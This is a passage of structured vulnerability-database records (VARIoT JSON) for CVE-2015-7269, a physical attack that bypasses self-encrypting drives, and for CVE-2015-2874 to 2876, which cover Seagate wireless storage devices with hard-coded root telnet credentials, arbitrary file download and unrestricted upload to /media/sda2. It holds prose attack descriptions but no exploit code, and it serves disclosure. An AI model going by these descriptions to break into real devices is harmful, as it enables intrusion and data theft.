"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "102266"
}
],
"trust": 0.3
},
"cve": "CVE-2015-7269",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CVE-2015-7269",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.4,
"id": "CNVD-2017-38307",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "VHN-85230",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "PHYSICAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.5,
"id": "CVE-2015-7269",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-7269",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-7269",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-38307",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-1080",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-85230",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "VULHUB",
"id": "VHN-85230"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a \"Hot Unplug Attack.\". Seagate ST500LT015 Vulnerabilities exist in the hard disk drives that bypass security features.Information may be obtained. LenovoThinkPadW541laptopswithBIOS2.21 is a notebook computer of China Lenovo (Lenovo) that uses BIOS 2.21 version. SeagateST500LT015harddiskdrive is a hard drive made by Seagate, a computer used in the United States. There is a security hole in the SeagateST500LT015harddiskdrive on the Lenovo ThinkPad W541 laptop with BIOS version 2.21. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "BID",
"id": "102266"
},
{
"db": "VULHUB",
"id": "VHN-85230"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7269",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-38307",
"trust": 0.6
},
{
"db": "BID",
"id": "102266",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-85230",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "VULHUB",
"id": "VHN-85230"
},
{
"db": "BID",
"id": "102266"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"id": "VAR-201711-0011",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "VULHUB",
"id": "VHN-85230"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
}
]
},
"last_update_date": "2025-04-20T23:24:51.935000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-254",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85230"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
},
{
"trust": 2.0,
"url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7269"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7269"
},
{
"trust": 0.3,
"url": "https://www.seagate.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "VULHUB",
"id": "VHN-85230"
},
{
"db": "BID",
"id": "102266"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "VULHUB",
"id": "VHN-85230"
},
{
"db": "BID",
"id": "102266"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-85230"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102266"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"date": "2017-11-27T22:29:00.333000",
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-85230"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102266"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "102266"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate ST500LT015 of HDD Vulnerabilities bypassing security functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
}
],
"trust": 0.6
}
}
VAR-201512-0526
Vulnerability from variot - Updated: 2025-04-13 21:32Unrestricted file upload vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to execute arbitrary code by uploading a file to /media/sda2 during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username "root" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. Seagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201512-0526",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wireless mobile storage",
"scope": null,
"trust": 1.4,
"vendor": "seagate",
"version": null
},
{
"model": "wireless plus mobile storage",
"scope": null,
"trust": 1.4,
"vendor": "seagate",
"version": null
},
{
"model": "wireless mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "goflex sattelite",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "lac9000436u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": "wireless plus mobile storage",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": "*"
},
{
"model": "lac9000464u",
"scope": "lte",
"trust": 1.0,
"vendor": "lacie",
"version": "2.3.0.014"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "fuel",
"scope": null,
"trust": 0.8,
"vendor": "lacie",
"version": null
},
{
"model": "goflex satellite",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "goflex sattelite",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.3.0.014"
},
{
"model": "technology llc seagate 36c",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2.2.0.005"
},
{
"model": "technology llc seagate 36c",
"scope": "ne",
"trust": 0.3,
"vendor": "seagate",
"version": "3.4.1.105"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:lacie:lacie_fuel",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
"sources": [
{
"db": "BID",
"id": "76547"
}
],
"trust": 0.3
},
"cve": "CVE-2015-2876",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CVE-2015-2876",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2015-006526",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "VHN-80837",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2015-2876",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-2876",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2015-006526",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-209",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-80837",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80837"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unrestricted file upload vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to execute arbitrary code by uploading a file to /media/sda2 during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2876"
},
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "VULHUB",
"id": "VHN-80837"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#903500",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2015-2876",
"trust": 2.8
},
{
"db": "JVN",
"id": "JVNVU92833570",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209",
"trust": 0.7
},
{
"db": "BID",
"id": "76547",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-80837",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80837"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"id": "VAR-201512-0526",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-80837"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T21:32:34.288000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware Updates for Seagate Products",
"trust": 0.8,
"url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
},
{
"title": "Multiple Seagate Fixes for wireless storage products without restricting file upload vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57746"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
},
{
"problemtype": "CWE-22",
"trust": 0.8
},
{
"problemtype": "CWE-255",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.kb.cert.org/vuls/id/903500"
},
{
"trust": 2.5,
"url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
},
{
"trust": 2.5,
"url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
},
{
"trust": 1.4,
"url": "https://apps1.seagate.com/downloads/request.html"
},
{
"trust": 1.4,
"url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/425.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu92833570/index.html"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
},
{
"trust": 0.3,
"url": "http://www.seagate.com/in/en/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80837"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#903500"
},
{
"db": "VULHUB",
"id": "VHN-80837"
},
{
"db": "BID",
"id": "76547"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-01T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80837"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
{
"date": "2015-12-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006526"
},
{
"date": "2015-09-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-209"
},
{
"date": "2015-12-31T05:59:04.737000",
"db": "NVD",
"id": "CVE-2015-2876"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-12-08T00:00:00",
"db": "CERT/CC",
"id": "VU#903500"
},
{
"date": "2015-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-80837"
},
{
"date": "2015-09-01T00:00:00",
"db": "BID",
"id": "76547"
},
